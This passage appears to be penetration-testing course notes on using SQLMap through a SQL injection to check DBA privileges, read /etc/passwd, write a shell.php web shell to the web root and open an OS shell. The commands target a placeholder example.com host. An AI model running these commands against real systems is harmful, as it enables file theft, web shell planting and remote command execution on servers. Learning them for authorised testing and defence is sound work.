SQLMap has the ability to utilize an SQL Injection to read and write files from the local system outside the DBMS. SQLMap can also attempt to give us direct command execution on the remote host if we had the proper privileges
File Read/Write
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE passwd;
Checking for DBA Privileges
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba[17:31:43] [INFO] fetching file: '/etc/passwd'
[17:31:43] [ERROR] no data retrieved
sqlmap -u "http://www.example.com/?id=1" --is-dbaReading Local Files
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
cat ~/.sqlmap/output/www.example.com/files/_etc_passwdWriting Local Files
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"OS Command Execution
we can test SQLMap’s ability to give us an easy OS shell without manually writing a remote shell. SQLMap utilizes various techniques to get a remote shell through SQL injection vulnerabilities, like writing a remote shell, as we just did, writing SQL functions that execute commands and retrieve output or even using some SQL queries that directly execute OS command, like xp_cmdshell in Microsoft SQL Server. To get an OS shell with SQLMap, we can use the --os-shell option, as follows:
sqlmap -u "http://www.example.com/?id=1" --os-shellBetter chance of direct output:
sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E